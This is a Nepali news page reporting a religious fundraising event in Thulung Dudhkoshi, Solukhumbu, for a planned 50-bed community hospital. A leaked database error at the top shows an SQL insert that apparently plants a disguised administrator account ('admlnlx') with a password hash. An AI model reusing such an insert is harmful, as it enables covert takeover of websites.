WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1MMYlbEWqheg.z4uSAmbWSspnN.V1.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:25:14', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशीमा अस्पताल निर्माणका लागि महायज्ञ शुरु – Gaule Khabar

थुलुङ दुधकोशीमा अस्पताल निर्माणका लागि महायज्ञ शुरु

थुलुङ दुधकोशीमा अस्पताल निर्माणका लागि महायज्ञ शुरु

गाउँले न्यूज सम्बाददाता, ३ चैत्र, सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिकाको मुक्लिमा अस्पताल निर्माणका लागि श्रीमत भागवत ज्ञान महायज्ञ शुरु गरिएको छ ।

५० शैयाको दुधकोशी सामुदायीक अस्पताल निर्माणका लागि सप्ताहव्यापी महायज्ञको आयोजना गरिएको छ । उद्घाटन शनिबार गरिएपनि पण्डित दिनबन्दु पोखरेलले कथाबाचन आजबाट सुरु गरिएको हो । कथा बचन विहान १० देखि साँझ ५ बजेसम्म रहने गाउँपालिकाले जनाएको छ ।

महायज्ञको मायध्मबाट २० करोड सहयोग संकलन गर्ने र २० हजार भन्दा बढि आन्तरिक पर्यटक भित्राउने लक्षय राखिएको छ । संकलित रकमले आगामी दुई बर्ष भित्र सुविधासम्पन्न अस्पताल निर्माण गरिनेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका